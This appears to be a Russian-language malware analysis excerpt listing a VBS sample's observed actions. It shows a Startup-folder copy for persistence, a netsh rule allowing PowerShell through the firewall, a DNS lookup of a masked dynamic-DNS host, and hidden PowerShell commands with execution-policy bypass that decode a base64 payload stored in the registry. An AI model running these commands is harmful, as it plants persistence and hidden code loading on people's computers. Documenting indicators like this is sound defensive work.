Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\<Имя файла>.vbs
- '<SYSTEM32>\netsh.exe' firewall add allowedprogram "<SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE
- DNS ASK sm###.zapto.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\<Имя файла>.vbs',[System.IO.File]::ReadAllText('<PATH_SAMPLE>.vbs'))"' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'KeyName').KeyName;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_...' (со скрытым окном)
- '<SYSTEM32>\netsh.exe' firewall add allowedprogram "<SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\<Имя файла>.vbs',[System.IO.File]::ReadAllText('<PATH_SAMPLE>.vbs'))"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'KeyName').KeyName;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_...